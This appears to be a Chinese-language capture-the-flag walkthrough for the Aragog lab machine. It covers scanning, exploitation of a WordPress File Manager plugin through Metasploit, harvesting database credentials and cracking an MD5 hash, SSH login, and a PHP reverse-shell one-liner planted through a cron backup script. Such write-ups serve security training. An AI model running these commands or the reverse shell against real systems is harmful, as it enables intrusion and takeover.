Aragog-1.0.2
1.信息收集
1.arp-scan -l扫描,寻找靶机
2.nmap扫描端口
sudo nmap -sV -p- 10.9.47.186 -T4
查看80端口
3.dirsearch 扫描目录
Just another WordPress site.
We will be deleting some of our unused wordpress plugins in future as security best practices.WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。
那么思路就是找到这个版本的WordPress有什么插件的漏洞。
2.漏洞扫描及利用
1.用wpscan,去注册个账号获取api-token。
wpscan --api-token=注册获取的值 --url http://10.9.47.186/blog -e p --plugins-detection aggressive
扫描到3个File Manager的漏洞
3.漏洞利用
1.使用msf进行漏洞利用
msfconsole #启动msf
search file manager wordpress #查找漏洞相关exp
use 1 #使用第1个exp
show options #查看需要设置的参数
set RHOSTS 192.168.15.135 #设置靶机IP
set TARGETURI /blog #设置路径
set LHOST 192.168.15.131 #设置攻击IP
run #启动攻击
成功获取到shell
4.提权
1.wordpress搭建的网站数据库账号密码会记录在/etc/wordpress目录里的config-default.php 文件里,查看后发现了数据库的root密码
mysql -u root -p #连接数据库
show databases; #查看所有数据库
use wordpress; #使用wordpress数据库
show tables; #查看wordpress数据库中所有表
select * from wp_users; #查看wp_users表内容
为方便操作,首先使用python打开交互式
python3 -c 'import pty;pty.spawn("/bin/bash")'
2.使用root密码连接数据库,我们在wordpress数据库下,wp_users表中查到一条登录记录
3.使用md5解密
4.进行远程登录
ssh hagrid98@10.9.47.186
密码:password123
5.成功登录,并在当前目录下发现了第一个魂器
6.继续查看目录文件,我们在/opt目录下发现一个隐藏的脚本文件:.backup.sh
7.查看脚本文件内容是将上传的文件复制到tmp目录里,应该是定时执行
所以我们到目录/tmp下写一个反弹shell的php脚本,
<?php $sock=fsockopen("192.168.15.131",7777);exec("/bin/sh -i <&3 >&3 2>&3"); ?>
8.然后修改.backup.sh脚本内容
9.kali开启瑞士军刀,等待反弹
成功